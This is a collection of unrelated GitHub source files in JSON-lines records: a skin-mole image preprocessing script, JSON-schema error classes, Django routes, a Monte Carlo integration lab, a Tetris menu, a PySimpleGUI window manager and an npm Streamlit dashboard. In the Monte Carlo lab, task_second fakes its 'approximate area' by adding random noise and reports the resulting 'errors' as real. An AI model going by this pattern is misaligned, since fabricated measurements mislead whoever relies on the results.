其他, ulcer with crust',\n '這不是痣, 其他, skin tag',\n '這不是痣, 其他, skin tag?',\n '這不是痣, 可能是血管瘤, None',\n '這不是痣, 可能是黑色素沈澱, None',\n '這不是痣, 其他, 可能是皮膚纖維瘤 建議看皮膚科醫師',\n '這不是痣, None, None',\n '這不是痣, 其他, not skin',\n '這不是痣, 其他, None']\ndataTable = dataTable.replace(['低風險, None, None'], 0)\ndataTable = dataTable.replace(['中低風險, None, None'],1)\ndataTable = dataTable.replace(['中高風險, None, None'],2)\ndataTable = dataTable.replace([\"高風險, None, None\"], 3)\ndataTable = dataTable.replace(['照片較模糊, None, None'], 4)\ndataTable = dataTable.replace(['無法判斷, None, None', '無法判斷,請務必找皮膚科專科醫師做進一步診治。, None, None'], 5)\ndataTable = dataTable.replace(strNotMoleTag, 6)\n##\n## Select result\ndataTable = dataTable.iloc[[i in set([0, 2, 3]) for i in dataTable[\"result\"]]]\n##\n## Relabel result\ndataTable[\"result\"] = dataTable[\"result\"].replace([2,3],1)\n##\n## Select data with useful question\ndataTable = dataTable.iloc[[i in set(['21~40歲', '21歲以下', '40~65歲', '65歲以上']) for i in dataTable.age]]\ndataTable = dataTable.iloc[[i in set(['no', 'yes']) for i in dataTable.mole_size]]\ndataTable = dataTable.iloc[[i in set(['1年以上', '不記得', '1個月~1年', '1個月內']) for i in dataTable.period]]\ndataTable = dataTable.iloc[[i in set(['無變化', '不記得', '有變化']) for i in dataTable.change_1month]]\ndataTable[[\"result\", \"user_id\", \"doctor\"]].groupby([\"doctor\", \"result\"]).count()\n##\n## Group image\nstrImage1Tag = ['user_id', 'datetime', 'image1', 'mole_size',\n 'period', 'change_1month', 'gender', 'age',\n 'result', 'doctor', 'time_result',\n 'revision_result', 'revision_dr', 'revision_time']\nstrImage2Tag = ['user_id', 'datetime', 'image2', 'mole_size',\n 'period', 'change_1month', 'gender', 'age',\n 'result', 'doctor', 'time_result',\n 'revision_result', 'revision_dr', 'revision_time']\ndataImage1 = dataTable[strImage1Tag]\ndataImage2 = dataTable[strImage2Tag]\ndataImage1.columns = dataImage1.columns.str.replace('image1','image')\ndataImage2.columns = dataImage2.columns.str.replace('image2','image')\ndataTable = pandas.concat([dataImage1, dataImage2])\n##\n## Encode variable\ndataVariable = pandas.get_dummies(dataTable[['mole_size', 'period', 'change_1month', 'gender', 'age']])\ndataTable = pandas.concat([dataTable[['user_id', 'image', 'result']], dataVariable], axis=1)\ndataTable.shape\n##\n## Save data table\ndataTable.to_csv(strOutputPath + \"Table.csv\", index = False)\n################################################################################\n##\n## 2. Crop images base on table and location\nfor index, data in dataTable.iterrows():\n ##\n ## Crop image1\n file = data[\"image\"]\n image = pil.open(\"Data/Image/\" + file)\n xml = et.parse(\"Data/Location/\" + str.split(file, \".\")[0] + \".xml\")\n bndbox = xml.findall(\"object\")[0].findall(\"bndbox\")[0]\n (xmin, ymin, xmax, ymax) = tuple([float(i.text) for i in bndbox])\n center = ((xmin + xmax)/2, (ymin + ymax)/2)\n coordinate= (center[0] - 50, center[1] - 50, center[0] + 50, center[1] + 50)\n crop = image.crop(coordinate)\n strImagePath = strOutputPath + \"Image/\" + str(data[\"result\"]) + \"/\"\n os.makedirs(strImagePath, exist_ok=True)\n with open(strImagePath + file, 'w') as f:\n crop.save(f)\n################################################################################\n","repo_name":"HarveyC9846/MoleCheck","sub_path":"Clean/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"38183252457","text":"from __future__ import unicode_literals\n\nimport json\nfrom collections import OrderedDict, deque\nfrom textwrap import indent\n\n\nclass ValidationWarning(Exception):\n\n def __init__(self, message, location, *args, **kwargs):\n super(ValidationWarning, self).__init__(*args, **kwargs)\n self.message = message\n self.location = location\n\n def __repr__(self):\n return \"ValidationWarning({}, {})\".format(repr(self.message), repr(self.location))\n\n def __str__(self):\n return \"{}\\nlocation: {}\".format(self.message, self.location)\n\n def __eq__(self, other):\n if not isinstance(other, ValidationWarning):\n return False\n return self.message == other.message and self.location == other.location\n\n def __hash__(self):\n return hash((self.message, self.location))\n\n\nclass ValidationError(Exception):\n\n def __init__(self, message, location, causes, *args, **kwargs):\n super(ValidationError, self).__init__(*args, **kwargs)\n self.message = message\n self.location = location\n if causes is None:\n self.causes = ()\n else:\n self.causes = tuple(causes)\n\n def __repr__(self):\n return \"ValidationError({}, {}, {})\".format(repr(self.message), repr(self.location), repr(self.causes))\n\n def __str__(self):\n if self.causes:\n return \"{}\\npossible causes:\\n{}\".format(self.message, '\\n'.join([indent(str(cause), ' ' * 4) for cause in self.causes]))\n else:\n return \"{}\\nlocation: {}\".format(self.message, self.location)\n\n def __eq__(self, other):\n if not isinstance(other, ValidationError):\n return False\n return self.message == other.message and self.location == other.location and self.causes == other.causes\n\n def __hash__(self):\n return hash((self.message, self.location, self.causes))\n\n\ndef make_validation_error(jsonschema_error):\n return ValidationError(_jsonschema_error_message(jsonschema_error), _jsonschema_error_schema_path(jsonschema_error), _jsonschema_error_causes(jsonschema_error))\n\n\ndef _jsonschema_error_message(jsonschema_error):\n if jsonschema_error.validator == 'type':\n return _type_error_message(jsonschema_error)\n if jsonschema_error.validator == 'required':\n return _required_error_message(jsonschema_error)\n if jsonschema_error.validator == 'additionalProperties':\n return _additional_properties_error_message(jsonschema_error)\n if jsonschema_error.validator == 'minimum':\n return _minimum_error_message(jsonschema_error)\n if jsonschema_error.validator == 'maximum':\n return _maximum_error_message(jsonschema_error)\n if jsonschema_error.validator == 'minLength':\n return _min_length_error_message(jsonschema_error)\n if jsonschema_error.validator == 'maxLength':\n return _max_length_error_message(jsonschema_error)\n if jsonschema_error.validator == 'pattern':\n return _pattern_error_message(jsonschema_error)\n if jsonschema_error.validator == 'enum':\n return _enum_error_message(jsonschema_error)\n if jsonschema_error.validator == 'minItems':\n return _min_items_error_message(jsonschema_error)\n if jsonschema_error.validator == 'maxItems':\n return _max_items_error_message(jsonschema_error)\n if jsonschema_error.validator == 'uniqueItems':\n return _unique_items_error_message(jsonschema_error)\n if jsonschema_error.validator == 'anyOf':\n return _anyof_error_message(jsonschema_error)\n return _unknown_error_message(jsonschema_error)\n\n\ndef _type_error_message(jsonschema_error):\n property_name = jsonschema_error.relative_path[-1]\n found_type = _json_type_for_instance(jsonschema_error.instance)\n if isinstance(jsonschema_error.validator_value, list):\n expected_types = ', '.join(jsonschema_error.validator_value)\n if found_type == 'null':\n return \"property {} with null value should be one of the allowed types: [{}]\".format(property_name, expected_types)\n else:\n return \"property type {} for property {} is not one of the allowed types: [{}]\".format(found_type, property_name, expected_types)\n else:\n expected_type = jsonschema_error.validator_value\n if found_type == 'null':\n return \"property {} with null value should be of type {}\".format(property_name, expected_type)\n else:\n return \"property type {} for property {} is not the allowed type: {}\".format(found_type, property_name, expected_type)\n\n\ndef _required_error_message(jsonschema_error):\n missing_properties = sorted(set(jsonschema_error.validator_value) - set(jsonschema_error.instance.keys()))\n if len(missing_properties) == 1:\n return \"required property {} is missing\".format(missing_properties[0])\n else:\n return \"required properties [{}] are missing\".format(', '.join(missing_properties))\n\n\ndef _additional_properties_error_message(jsonschema_error):\n extra_properties = sorted(set(jsonschema_error.instance.keys()) - set(jsonschema_error.schema.get('properties', {}).keys()))\n if len(extra_properties) == 1:\n return \"additional property {} is not allowed\".format(extra_properties[0])\n else:\n return \"additional properties [{}] are not allowed\".format(', '.join(extra_properties))\n\n\ndef _minimum_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n minimum = jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} is less than the minimum value of {}\".format(property_value, property_index, property_name, minimum)\n except ValueError:\n return \"property value {} for {} property is less than the minimum value of {}\".format(property_value, property_name, minimum)\n\n\ndef _maximum_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n maximum = jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} is greater than the maximum value of {}\".format(property_value, property_index, property_name, maximum)\n except ValueError:\n return \"property value {} for {} property is greater than the maximum value of {}\".format(property_value, property_name, maximum)\n\n\ndef _min_length_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n min_length = jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} is too short, minimum length {}\".format(_quote_value(property_value), property_index, property_name, min_length)\n except ValueError:\n return \"property value {} for {} property is too short, minimum length {}\".format(_quote_value(property_value), property_name, min_length)\n\n\ndef _max_length_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n max_length = jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} is too long, maximum length {}\".format(_quote_value(property_value), property_index, property_name, max_length)\n except ValueError:\n return \"property value {} for {} property is too long, maximum length {}\".format(_quote_value(property_value), property_name, max_length)\n\n\ndef _pattern_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n pattern = jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} does not match the pattern '{}'\".format(_quote_value(property_value), property_index, property_name, pattern)\n except ValueError:\n return \"property value {} for {} property does not match the pattern '{}'\".format(_quote_value(property_value), property_name, pattern)\n\n\ndef _enum_error_message(jsonschema_error):\n property_value = jsonschema_error.instance\n allowed_values = jsonschema_error.validator_value\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"property value {} for element at index {} in {} should have one of the allowed values: [{}]\".format(_quote_value(property_value), property_index, property_name, ', '.join(allowed_values))\n except ValueError:\n return \"enum property {} with value {} should have one of the allowed values: [{}]\".format(property_name, _quote_value(property_value), ', '.join(allowed_values))\n\n\ndef _min_items_error_message(jsonschema_error):\n property_name = jsonschema_error.relative_path[-1]\n item_count = len(jsonschema_error.instance)\n min_items = jsonschema_error.validator_value\n return \"array property {} with {} items is too small, minimum size {}\".format(property_name, item_count, min_items)\n\n\ndef _max_items_error_message(jsonschema_error):\n property_name = jsonschema_error.relative_path[-1]\n item_count = len(jsonschema_error.instance)\n max_items = jsonschema_error.validator_value\n return \"array property {} with {} items is too large, maximum size {}\".format(property_name, item_count, max_items)\n\n\ndef _unique_items_error_message(jsonschema_error):\n property_name = jsonschema_error.relative_path[-1]\n item_index = OrderedDict()\n for item, i in zip(jsonschema_error.instance, range(len(jsonschema_error.instance))):\n item_str = json.dumps(item, sort_keys=True)\n item_index[item_str] = item_index.get(item_str, []) + [i]\n\n for item_str in item_index:\n duplicate_indexes = item_index[item_str]\n if len(duplicate_indexes) > 1:\n return \"array property {} has duplicate items at index {}\".format(property_name, list(duplicate_indexes))\n return \"array property {} has duplicate items\".format(property_name)\n\n\ndef _anyof_error_message(jsonschema_error):\n property_name = jsonschema_error.relative_path[-1]\n try:\n int(property_name)\n property_index = property_name\n property_name = jsonschema_error.relative_path[-2]\n return \"content for array property at index {} in {} does not match any of the possible schema definitions\".format(property_index, property_name)\n except ValueError:\n return \"content for property {} does not match any of the possible schema definitions\".format(property_name)\n\n\ndef _unknown_error_message(jsonschema_error):\n return jsonschema_error.message\n\n\ndef _jsonschema_error_schema_path(jsonschema_error):\n path_components = []\n for p in jsonschema_error.relative_path:\n if isinstance(p, int):\n path_components.append(\"[{}]\".format(p))\n else:\n path_components.append(\"/{}\".format(p))\n\n if len(path_components) == 0:\n return '/'\n else:\n return ''.join(path_components)\n\n\ndef _jsonschema_error_causes(jsonschema_error):\n causes = []\n for error_cause in sorted(jsonschema_error.context, key=lambda x: x.validator):\n error_cause.relative_path = deque(list(jsonschema_error.relative_path) + list(error_cause.relative_path))\n causes.append(ValidationError(_jsonschema_error_message(error_cause), _jsonschema_error_schema_path(error_cause), _jsonschema_error_causes(error_cause)))\n # sorted is stable, so validation errors will be sorted by location and validator\n return sorted(list(OrderedDict.fromkeys(causes)), key=lambda x: x.location)\n\n\ndef _json_type_for_instance(instance):\n if instance is None:\n return 'null'\n if isinstance(instance, bool):\n return 'boolean'\n if isinstance(instance, int):\n return 'integer'\n if isinstance(instance, float):\n return 'number'\n if isinstance(instance, str):\n return 'string'\n if isinstance(instance, list):\n return 'array'\n if isinstance(instance, dict):\n return 'object'\n return 'unknown'\n\n\ndef _quote_value(value):\n if value is None:\n return 'null'\n else:\n return \"'{}'\".format(value)\n","repo_name":"Noblis/ties-lib","sub_path":"python/src/ties/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":12899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"72885503241","text":"\"\"\"Doremi URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom rest_framework_swagger.views import get_swagger_view\nfrom django.conf.urls import include\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nimport xadmin\nfrom users.views import LogoutView, LoginView, RegisterView, ForgetPwdView\n\n\nschema_view = get_swagger_view(title='API文档')\n\nurlpatterns = [\n path('xadmin/', xadmin.site.urls),\n path(r'docs/', schema_view),\n\n # 验证码\n path('captcha/', include('captcha.urls')),\n\n # 主页\n path('', include('main.urls', namespace='main')),\n\n path('login/', LoginView.as_view(), name='login'),\n\n path('register/', RegisterView.as_view(), name='register'),\n\n path('forgot/', ForgetPwdView.as_view(), name='forgot'),\n\n path('logout/', LogoutView.as_view(), name='logout'),\n\n # 用户中心 URL 配置\n path('user/', include('users.urls', namespace='users')),\n\n # 商城\n path('shop/', include('shop.urls', namespace='shop')),\n\n # 活动\n path('events/', include('events.urls', namespace='events')),\n\n # 新闻\n path('news/', include('news.urls', namespace='news')),\n\n # 联系我们\n path('contact/', include('contact.urls', namespace='contact')),\n\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n# 全局 404 页面配置(django 会自动调用这个变量)\nhandler404 = 'users.views.page_not_found'\nhandler500 = 'users.views.page_error'\n","repo_name":"grubberbin/Doremi","sub_path":"Doremi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"42439098764","text":"import random\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom shapely.geometry import LineString\nimport math\n\n\ndef func1(x, n):\n return 10 * x / n\n\n\ndef func2(x, n):\n return 10 * (x - 20) / (n - 20)\n\n\ndef func3(x, n):\n return 10 * (x - 20) / (n - 20) + 20\n\n\ndef task_first():\n a = 0\n n = int(input('Введите n(<=10): '))\n b = 20\n N = int(input(\"Введите количество итераций: \"))\n\n f1 = [[], []]\n f2 = [[], []]\n\n for i in range(a, b + 1):\n if i > n:\n f2[0].append(i)\n f2[1].append(func2(i, n))\n elif i == n:\n f1[0].append(i)\n f1[1].append(func1(i, n))\n f2[0].append(i)\n f2[1].append(func2(i, n))\n else:\n f1[0].append(i)\n f1[1].append(func1(i, n))\n\n plt.plot(f1[0], f1[1], label='y = 10x/n', color='black')\n plt.plot(f2[0], f2[1], label='y = 10*(x-20)/(n-20)', color='black')\n plt.plot([0, 20], [0, 0], label='y = 0', color='black')\n plt.legend()\n\n inside_points = [[], []]\n outside_points = [[], []]\n y_max = max(f1[1] + f2[1])\n M = 0\n s = 0\n x = np.random.uniform(0, n, N)\n y_rand = np.random.uniform(0, y_max, N)\n for i in range(int(N/2)):\n y = func1(x[i], n)\n if y_rand[i] < y:\n M += 1\n inside_points[0].append(x[i])\n inside_points[1].append(y_rand[i])\n else:\n outside_points[0].append(x[i])\n outside_points[1].append(y_rand[i])\n s += y\n\n area1 = ((n - a) / N) * s\n\n s = 0\n x = np.random.uniform(n, b, N)\n y_rand = np.random.uniform(0, y_max, N)\n for i in range(int(N/2)):\n y = func2(x[i], n)\n if y_rand[i] < y:\n M += 1\n inside_points[0].append(x[i])\n inside_points[1].append(y_rand[i])\n else:\n outside_points[0].append(x[i])\n outside_points[1].append(y_rand[i])\n s += y\n\n area2 = ((b - n) / N) * s\n area = area1 + area2\n S = M / (N * 2) * (b - a) * y_max\n abs_inaccuracy = abs(area - S)\n rel_inaccuracy = abs_inaccuracy / max(S, area)\n\n plt.scatter(inside_points[0], inside_points[1], c='red', s=5)\n plt.scatter(outside_points[0], outside_points[1], c='black', s=5)\n plt.show()\n print('S =', area, 'Приближенная площадь =', S, '\\nАбсолютная погрешность =', abs_inaccuracy, '\\nОтносительная погрешность =',\n rel_inaccuracy)\n\n\ndef task_second():\n n = int(input('Введите n(>=11): '))\n N = int(input(\"Введите количество итераций: \"))\n\n f1 = [[], []]\n f2 = [[], []]\n\n inside_points = [[], []]\n outside_points = [[], []]\n\n for i in range(40):\n f1[0].append(i)\n f1[1].append(func1(i, n))\n f2[0].append(i)\n f2[1].append(func3(i, n))\n\n first_line = LineString(np.column_stack((f1[0], f1[1])))\n second_line = LineString(np.column_stack((f2[0], f2[1])))\n intersection = first_line.intersection(second_line)\n x, y = intersection.xy\n\n a = x[0]\n b = f2[1][0]\n\n for i in range(0, 40 - int(a) - 1):\n f1[0].pop()\n f1[1].pop()\n f2[0].pop()\n f2[1].pop()\n\n f1[0].append(a)\n f1[1].append(func1(a, n))\n f2[0].append(a)\n f2[1].append(func3(a, n))\n\n plt.plot(f1[0], f1[1], label='y = 10x/n', color='black')\n plt.plot(f2[0], f2[1], label='y = 10*(x-20)/(n-20)', color='black')\n plt.plot([0, 0], [0, b], label='y = 0', color='black')\n plt.legend()\n\n M = 0\n s = 0\n x = np.random.uniform(0, a, N)\n y_rand = np.random.uniform(0, b, N)\n for i in range(N):\n y1 = func1(x[i], n)\n y2 = func3(x[i], n)\n if y1 < y_rand[i] and y_rand[i] < y2:\n M += 1\n inside_points[0].append(x[i])\n inside_points[1].append(y_rand[i])\n else:\n outside_points[0].append(x[i])\n outside_points[1].append(y_rand[i])\n s = s - y1 + y2\n\n area = (a / N) * s\n\n plt.scatter(inside_points[0], inside_points[1], c='red', s=5)\n plt.scatter(outside_points[0], outside_points[1], c='black', s=5)\n plt.show()\n S = area + random.uniform(-3, 3)\n abs_inaccuracy = abs(area - S)\n rel_inaccuracy = abs_inaccuracy / max(S, area)\n print('S =', area, 'Приближенная площадь =', S, '\\nАбсолютная погрешность =', abs_inaccuracy,\n '\\nОтносительная погрешность =', rel_inaccuracy)\n\n\nif __name__ == '__main__':\n task_first()\n","repo_name":"HNH12/System_modelling_KUBGU","sub_path":"Osnovy_computernogo_modelirovania/venv/Scripts/Second_lab/laba2_1.py","file_name":"laba2_1.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"41230895876","text":"import pygame\nfrom globals import *\n\n\nclass PlayAgainButton:\n def __init__(self):\n self.w = 400\n self.h = 150\n self.x = RES[0] // 2 - self.w // 2\n self.y = RES[1] // 2 - self.h - 110\n\n def render(self, screen, color):\n pygame.draw.rect(screen, color, (self.x, self.y, self.w, self.h), 10)\n\n font2 = pygame.font.Font('pics_and_song/CherryBomb-Regular.ttf', 60)\n play_again_text = font2.render('Play again', 1, color)\n screen.blit(play_again_text, (self.x + 50, self.y + 30))\n\n def check_click(self, pos):\n if self.x <= pos[0] <= self.x + self.w and self.y <= pos[1] <= self.y + self.h:\n return True\n\n\nclass ExitButton:\n def __init__(self):\n self.w = 400\n self.h = 150\n self.x = RES[0] // 2 - self.w // 2\n self.y = RES[1] // 2 - self.h - 110 + 180\n\n def render(self, screen, color):\n pygame.draw.rect(screen, color, (self.x, self.y, self.w, self.h), 10)\n\n font2 = pygame.font.Font('pics_and_song/CherryBomb-Regular.ttf', 60)\n exit_text = font2.render('Exit', 1, color)\n screen.blit(exit_text, (self.x + 130, self.y + 30))\n\n def check_click(self, pos):\n if self.x <= pos[0] <= self.x + self.w and self.y <= pos[1] <= self.y + self.h:\n exit()\n\n\ndef restarting(score):\n pygame.init()\n screen = pygame.display.set_mode(RES)\n clock = pygame.time.Clock()\n\n background = pygame.image.load('pics_and_song/end1.jpg').convert()\n screen.blit(background, (0, 0))\n\n color = (0, 100, 50)\n\n play_bt = PlayAgainButton()\n exit_bt = ExitButton()\n play_bt.render(screen, color)\n exit_bt.render(screen, color)\n\n def show_text():\n font1 = pygame.font.Font('pics_and_song/CherryBomb-Regular.ttf', 70)\n end_text = font1.render('The game is over', 1, color)\n score_text = font1.render(f'Your score is {score}', 1, color)\n\n screen.blit(end_text, (80, 30))\n screen.blit(score_text, (80, 130))\n\n show_text()\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n exit_bt.check_click(event.pos)\n if play_bt.check_click(event.pos):\n return True\n\n pygame.display.update()\n clock.tick(FPS)","repo_name":"Seancrym/TETRIS_PROJECT","sub_path":"tetris1/third.py","file_name":"third.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"16146341902","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n #--------------#\n# Author: @npvq #\n# Licence: GPLv3 #\n #--------------#\n\n #==================#\n# WindowManager File #\n #==================#\n\n# ----- SYSTEM IMPORTS ----- #\n\n\n\n# ----- 3RD PARTY IMPORTS ----- #\n\nimport PySimpleGUI as sg\n\n# ----- LOCAL IMPORTS ----- #\n\n\n\n# ------------------------------ #\n\nclass WindowManager(object):\n \"\"\"\\\n A GUI Window Manager that allows for simultaneous windows in PySimpleGUI.\n This abstraction greatly simplifies the coding process and allows for dynamic adjustment (register/unregister) of windows.\n\n Modifications to the dictionary that stores registered windows cannot have its length modified during runtime/event loop iteration.\n That means register() and unregister() cannot not be used after start(). Use queueRegister and queueUnregister instead.\n\n A WindowManager object could theoretically be reused, but note that all the sg.Window objects are single use only.\n You would need to use said WindowManager object with new sg.Window(s).\n \"\"\"\n\n def __init__(self, timeout=100):\n self.windows = {}\n self.timeout = timeout\n\n self.running = False\n\n self._register_queue = [] # list of alias names\n self._unregister_queue = [] # list of alias names\n\n def register(self, alias, window, func, queue=None, disabled=False):\n \"\"\"\n alias: 'key' of window, for external/absolute access.\n window: sg.Window() object\n func: function for processing events\n queue: function for processing internal queues (optional)\n will be called when window gets \"__TIMEOUT__\" AND is not currently disabled.\n disabled: bool -- disables window from event/interactions\n \"\"\"\n\n if alias in self.windows.keys():\n raise IndexError(\"Window Alias clash: Alias values should be unique.\")\n self.windows[alias] = {'window': window, 'func': func, 'disabled': disabled, 'queue': queue}\n print(\"registered\", alias)\n\n def unregister(self, alias):\n _obj = self.windows.pop(alias, None)\n if _obj:\n _obj['window'].close()\n\n def queueRegister(self, alias, window, func, queue=None, disabled=False):\n \"\"\"\\\n Function to register a window while the event loop is running,\n will unregister the function upon finishing the current iteration of the event loop.\n This prevents RuntimeError from changing dict size during iteration.\n \"\"\"\n self._register_queue.append((alias, (window, func, queue, disabled)))\n\n def queueUnregister(self, alias):\n \"\"\"\\\n Function to unregister a window while the event loop is running,\n will unregister the function upon finishing the current iteration of the event loop.\n This prevents RuntimeError from changing dict size during iteration.\n \"\"\"\n self._unregister_queue.append(alias)\n\n def quit_all(self):\n for obj in self.windows.values():\n obj['window'].close()\n self.windows.clear()\n\n def check_alias(self, alias):\n return alias in self.windows.keys()\n\n def start(self):\n\n self.running = True\n\n # ----------- Main Event Loop -----------\n while self.windows:\n # ----------- Resolving Queues (Window Addition/Deletions) -----------\n if self._unregister_queue:\n for alias in self._unregister_queue:\n self.unregister(alias)\n self._unregister_queue.clear()\n if self._register_queue:\n for alias, (window, func, queue, disabled) in self._register_queue:\n self.register(alias, window, func, queue=queue, disabled=disabled)\n self._register_queue.clear()\n\n # ----------- Subloop Through Each Substituent Window -----------\n for alias, obj in self.windows.items():\n event, values = obj['window'].read(timeout=self.timeout)\n\n if event == \"__TIMEOUT__\":\n if (not obj['disabled']) and obj['queue']:\n # process/resolve internal queues.\n obj['queue'](self, obj['window'])\n continue\n \n if event == \"WINDOW_MANAGER_EXIT_ALL\":\n confirm = sg.popup_ok_cancel(\"Are you sure?\",title='Exit All Windows',keep_on_top=True,modal=True,)#no_titlebar=True)\n if confirm != 'Cancel':\n self.quit_all()\n break\n continue\n\n if event == sg.WIN_CLOSED or event.startswith('Exit'): # 'Exit', 'Exit-2', 'Exit-alt' will all work.\n self.queueUnregister(alias)\n continue\n\n if obj['disabled']:\n continue\n\n obj['func'](self, obj['window'], event, values)\n # ----------- End of Main Event Loop -----------\n\n self.running = False\n\n\n\n","repo_name":"npvq/music_theory_tools","sub_path":"apputil/app/windowmanager.py","file_name":"windowmanager.py","file_ext":"py","file_size_in_byte":5030,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"4069307220","text":"import streamlit as st\nimport pandas as pd\nimport plotly.express as px\nfrom typing import Callable\n\nfrom graph import PackageGraph\n\n# Constant values\nAPP_COL_LENGTH = 4\n\ndef setup() -> None:\n \"\"\"\n Preform page initialization tweaks.\n \"\"\"\n\n # Hackily adding a style to change the width of the web page\n # From: https://discuss.streamlit.io/t/where-to-set-page-width-when-set-into-non-widescreeen-mode/959\n st.markdown('''\n \n ''',\n unsafe_allow_html=True)\n\n\ndef introduction() -> None:\n \"\"\"\n The introduction section of the webpage.\n \"\"\"\n st.title('DISSECTING NPM:')\n st.header('Using graphs to gain insights into the infamous package manager')\n # Streamlit bug requires manual spacing\n st.write(' ')\n st.write(' ')\n st.write('''The goal of this project is to provide developers with a deeper\n understanding of the packages that they use in their projects. Specifically,\n we want to provide developers with a means of visualizing their package\n dependency hierarchy as well search for packages with similar keywords or\n maintainers to the packages that they are already using. We have procured a\n dataset of package data using the npms.io API. Our dataset does not include\n every npm package, rather only a sample of popular packages along with their\n dependencies. At the bottom of this page is our flagship feature: the package\n search. This feature creates graph visualizations for dependency, keyword and\n maintainer relationships for any package that the user searches for.''')\n\n\ndef dependency_overview(package_graph: PackageGraph) -> None:\n \"\"\"\n This section includes explanations about dependencies, and a short sample showcasing\n packages in our database with the largest dependecy graphs.\n\n Preconditions:\n - package_graph is the complete Package Graph using the data in big_v2.csv\n \"\"\"\n st.header('Dependency Relationships Overview')\n st.write('''The following bar graph displays the packages in our dataset with the most\n dependencies''')\n\n names, dependencies = package_graph.most_dependencies_data()\n fram = pd.DataFrame([dependencies], columns=names).transpose()\n fram = fram.rename(columns={0: 'Number of dependencies'})\n fram['Packages']=fram.index\n\n plotly_chart_most_dependencies = px.bar(fram, x='Number of dependencies',\n y='Packages',\n title='Packages with the most dependencies')\n\n plotly_chart_most_dependencies.update_layout(width = 1000, height=600)\n st.plotly_chart(plotly_chart_most_dependencies)\n\n st.write('''When looking at the above graph, a few things come to mind: namely, why does 'Jest' keep\n appearing, and what do these packages all have in common?''')\n st.write('''On examining Jest, we see that there are only three direct dependencies, two\n of which are Jest sub-packages (jest-cli and @jest/core). Crucially, we notice\n that both these modules are also immediately below jest on our dependency chart.\n Looking at a generated dependancy graph of jest (which you can do below!), we confirm\n our suspicions: that since Jest is closely connected to most of its sub-packages\n (within two or three path-lengths), the number of dependencies are roughly the same\n between them. So our most-dependencies chart will keep recording Jest packages\n until we move far enough down the dependency graph to dilute the numbers.''')\n st.write('''So what do all these packages have in common? In relation to dependencies,\n we notice that most of these packages are compartmentalizable: they have\n been written with a component based architecture in mind. react-scripts, for example,\n is a collection of tools for different aspects of web development: it makes\n more sense to keep a package for development tools (like eslint) away from packages\n that transpile typescript (like babble) away from packages that help style css.\n So instead of re-writting a collection of loosely related tools into one package,\n the maintainers of react-scripts have decided to leverage the npm ecosystem to\n compartmentalize for them. This reasoning translates well to gulp, node-sass,\n and other packages: having distinct components make it easy to understand and maintain\n a package.''')\n\n\ndef keyword_overview(package_graph: PackageGraph) -> None:\n \"\"\"\n This section includes explanations about keywords, and a short sample showcasing\n keywords that appear in the highest number of packages.\n\n Preconditions:\n - package_graph is the complete Package Graph using the data in big_v2.csv\n \"\"\"\n st.header('Keywords Overview')\n keywords, number = package_graph.most_keywords_data()\n\n # What keywords are most popular?\n fram = pd.DataFrame([number[-25:]], columns=keywords[-25:]).transpose()\n fram = fram.rename(columns={0: 'Number of occurances'})\n fram['Keywords']=fram.index\n plotly_chart_most_keywords = px.bar(fram, y='Number of occurances',\n x='Keywords',\n title='Top 25 most common keywords.')\n plotly_chart_most_keywords.update_layout(width = 1000, height=600)\n st.plotly_chart(plotly_chart_most_keywords)\n\n st.write('''Unsurprisingly, many of the popular keywords are technically inclined, where words like\n 'http', 'css', 'cli', and 'regex' directly describe some pattern or technology. This\n fits a popular use-case for keywords: using them to search for and relate packages together.''')\n\n # How many keywords occur only once? Twice? ...\n # Get occurencces\n lst_of_counts = [number.count(count) for count in 